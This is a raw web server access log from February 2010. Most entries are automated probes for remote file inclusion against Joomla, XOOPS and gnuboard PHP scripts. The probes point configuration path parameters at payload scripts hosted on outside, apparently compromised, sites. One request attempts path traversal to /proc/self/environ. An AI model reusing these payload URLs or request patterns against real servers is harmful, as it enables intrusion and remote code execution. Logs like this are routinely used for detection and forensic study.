216.119.103.16 - - [15/Feb/2010:03:25:13 -0500] "GET /logs///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:03:25:14 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:03:25:15 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:03:25:20 -0500] "GET /logs/access_log.Q110011800%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:03:25:48 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:03:25:48 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:03:25:48 -0500] "GET /logs/access_log.Q110011800%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
204.12.11.202 - - [15/Feb/2010:03:25:59 -0500] "GET /logs/access_log.Q109111100//tools/send_reminders.php?noSet=0&includedir=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:26:08 -0500] "GET /logs/error_log.Q109051400/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:26:09 -0500] "GET /logs/access_log.Q109052000/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Feb/2010:03:26:12 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.141.91.138 - - [15/Feb/2010:03:26:19 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:03:26:20 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:03:26:21 -0500] "GET /logs/access_log.Q110011800%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:03:26:24 -0500] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:03:26:24 -0500] "GET /logs/access_log.Q109080900%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:03:26:24 -0500] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:03:26:26 -0500] "GET //write_update.php?board_skin_path=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:03:26:27 -0500] "GET //write_update.php?board_skin_path=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:03:26:30 -0500] "GET /logs/access_log.Q110020800%20%20//write_update.php?board_skin_path=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:03:26:30 -0500] "GET /logs//write_update.php?board_skin_path=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:03:26:31 -0500] "GET /logs//write_update.php?board_skin_path=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:03:26:31 -0500] "GET /logs/access_log.Q110020800%20%20//write_update.php?board_skin_path=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:03:26:32 -0500] "GET /logs//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:03:26:32 -0500] "GET //bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:03:26:32 -0500] "GET /logs/access_log.Q110020800//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
69.13.69.245 - - [15/Feb/2010:03:26:34 -0500] "GET //write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
69.13.69.245 - - [15/Feb/2010:03:26:34 -0500] "GET /logs/access_log.Q110020800//write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
69.13.69.245 - - [15/Feb/2010:03:26:34 -0500] "GET /logs//write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
69.13.69.245 - - [15/Feb/2010:03:26:42 -0500] "GET //write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
69.13.69.245 - - [15/Feb/2010:03:26:42 -0500] "GET /logs/access_log.Q110020800//write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
69.13.69.245 - - [15/Feb/2010:03:26:42 -0500] "GET /logs//write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:26:47 -0500] "GET /logs/error_log.Q109051400/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:26:52 -0500] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:26:53 -0500] "GET /logs/access_log.Q109060500//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:26:53 -0500] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:26:57 -0500] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:26:57 -0500] "GET /logs/access_log.Q109060500//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:26:58 -0500] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:03:26:59 -0500] "GET /logs/access_log.Q110011200%20%20//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:27:01 -0500] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:27:01 -0500] "GET /logs/access_log.Q109060500//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:27:01 -0500] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:03:27:05 -0500] "GET /logs/access_log.Q110020300%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:03:28:11 -0500] "GET /logs/access_log.Q110013100%20%20//write_update.php?board_skin_path=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
212.241.177.123 - - [15/Feb/2010:03:28:13 -0500] "GET /logs/access_log.Q110020800//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
212.241.177.123 - - [15/Feb/2010:03:28:13 -0500] "GET //write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
212.241.177.123 - - [15/Feb/2010:03:28:13 -0500] "GET /logs//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:03:28:14 -0500] "GET /logs/access_log.Q110013100%20%20//write_update.php?board_skin_path=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:28:23 -0500] "GET /logs/access_log.Q109053100//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:28:27 -0500] "GET /logs/error_log.Q109053100//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:28:27 -0500] "GET /logs//bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:28:27 -0500] "GET /logs/error_log.Q110020500%20%20//bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:28:27 -0500] "GET //bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:28:42 -0500] "GET /logs/error_log.Q110020500%20%20//bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:28:42 -0500] "GET /logs//bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:28:42 -0500] "GET //bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:28:44 -0500] "GET /logs/access_log.Q109053100//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:28:45 -0500] "GET /logs/access_log.Q110010900%20%20//bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:28:47 -0500] "GET /logs/error_log.Q109053100//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:28:53 -0500] "GET /logs/access_log.Q110010900%20%20//bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
212.241.177.123 - - [15/Feb/2010:03:29:01 -0500] "GET /logs//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
212.241.177.123 - - [15/Feb/2010:03:29:01 -0500] "GET /logs/access_log.Q110020800//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
212.241.177.123 - - [15/Feb/2010:03:29:01 -0500] "GET //write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:29:08 -0500] "GET /logs/access_log.Q109053100//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:29:14 -0500] "GET /logs/error_log.Q109053100//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:03:30:09 -0500] "GET //include/bbs.lib.inc.php?site_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:03:30:09 -0500] "GET /logs/access_log.Q109073100%20%20//include/bbs.lib.inc.php?site_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:03:30:09 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:03:30:09 -0500] "GET /logs/access_log.Q109081500%20%20//include/bbs.lib.inc.php?site_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:03:30:26 -0500] "GET /logs/access_log.Q109073100%20%20//include/bbs.lib.inc.php?site_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:03:30:26 -0500] "GET /logs/access_log.Q109081500%20%20//include/bbs.lib.inc.php?site_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:03:30:26 -0500] "GET //include/bbs.lib.inc.php?site_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:03:30:26 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.186.64.181 - - [15/Feb/2010:03:30:53 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sbkmall.com/data/customer_logz/id1? HTTP/1.0" 404 234 "-" "Mozilla/5.0"
195.186.64.181 - - [15/Feb/2010:03:30:53 -0500] "GET /logs/access_log.Q110011800%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sbkmall.com/data/customer_logz/id1? HTTP/1.0" 404 263 "-" "Mozilla/5.0"
195.186.64.181 - - [15/Feb/2010:03:30:54 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sbkmall.com/data/customer_logz/id1? HTTP/1.0" 404 239 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:03:31:04 -0500] "GET /logs/access_log.Q109112400%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:03:31:04 -0500] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:03:31:07 -0500] "GET //components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
122.201.82.173 - - [15/Feb/2010:03:31:08 -0500] "GET /logs/error_log.Q109082400/index.php?dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.831"
200.93.147.154 - - [15/Feb/2010:03:31:30 -0500] "GET /logs/access_log.Q110020700%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
203.124.149.168 - - [15/Feb/2010:03:31:52 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
203.124.149.168 - - [15/Feb/2010:03:31:52 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.119.103.16 - - [15/Feb/2010:03:32:45 -0500] "GET /logs/access_log.Q110011800///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:32:52 -0500] "GET /logs/error_log.Q110020500//bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
195.186.64.181 - - [15/Feb/2010:03:32:56 -0500] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 226 "-" "Mozilla/5.0"
195.186.64.181 - - [15/Feb/2010:03:32:56 -0500] "GET /logs/access_log.Q110020800%20%20//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 255 "-" "Mozilla/5.0"
195.186.64.181 - - [15/Feb/2010:03:32:58 -0500] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 231 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:32:58 -0500] "GET /logs/access_log.Q110010900//bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:03:33:00 -0500] "GET /logs/access_log.Q110011600/historytemplate.php?cms[support]=1&cms[tngpath]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:33:03 -0500] "GET /logs/error_log.Q110020500//bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:33:08 -0500] "GET /logs/access_log.Q110010900//bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
187.45.193.155 - - [15/Feb/2010:03:33:10 -0500] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.de-port.com//administrator/components/com_virtuemart/id1autoscan.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
187.45.193.155 - - [15/Feb/2010:03:33:10 -0500] "GET /logs/access_log.Q109062700%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.de-port.com//administrator/components/com_virtuemart/id1autoscan.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
187.45.193.155 - - [15/Feb/2010:03:33:10 -0500] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.de-port.com//administrator/components/com_virtuemart/id1autoscan.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
187.45.193.155 - - [15/Feb/2010:03:33:11 -0500] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.de-port.com//administrator/components/com_virtuemart/id1autoscan.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
187.45.193.155 - - [15/Feb/2010:03:33:11 -0500] "GET /logs/access_log.Q109062700%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.de-port.com//administrator/components/com_virtuemart/id1autoscan.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
187.45.193.155 - - [15/Feb/2010:03:33:11 -0500] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.de-port.com//administrator/components/com_virtuemart/id1autoscan.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
195.186.64.181 - - [15/Feb/2010:03:33:13 -0500] "GET /logs/access_log.Q110020800%20%20//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 255 "-" "Mozilla/5.0"
195.186.64.181 - - [15/Feb/2010:03:33:13 -0500] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 231 "-" "Mozilla/5.0"
195.186.64.181 - - [15/Feb/2010:03:33:14 -0500] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 226 "-" "Mozilla/5.0"
187.45.193.155 - - [15/Feb/2010:03:33:16 -0500] "GET /logs/access_log.Q110011500%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.de-port.com//administrator/components/com_virtuemart/id1autoscan.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
195.186.64.181 - - [15/Feb/2010:03:33:19 -0500] "GET /logs/access_log.Q109081400%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sbkmall.com/data/customer_logz/id1? HTTP/1.0" 404 263 "-" "Mozilla/5.0"
187.45.193.155 - - [15/Feb/2010:03:33:27 -0500] "GET /logs/access_log.Q110011500%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.de-port.com//administrator/components/com_virtuemart/id1autoscan.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
74.54.22.2 - - [15/Feb/2010:03:33:57 -0500] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 248 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
74.54.22.2 - - [15/Feb/2010:03:33:57 -0500] "GET ///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 243 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
216.119.103.16 - - [15/Feb/2010:03:34:02 -0500] "GET /logs/access_log.Q109122000///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:34:08 -0500] "GET //bbs/write_update.php//gnuboard4//bbs/write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:34:08 -0500] "GET /logs/access_log.Q110012000%20%20//bbs/write_update.php//gnuboard4//bbs/write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:34:08 -0500] "GET /logs//bbs/write_update.php//gnuboard4//bbs/write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:34:08 -0500] "GET /logs/error_log.Q110012000%20%20//bbs/write_update.php//gnuboard4//bbs/write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Feb/2010:03:34:10 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.140.23.24 - - [15/Feb/2010:03:34:59 -0500] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:03:34:59 -0500] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
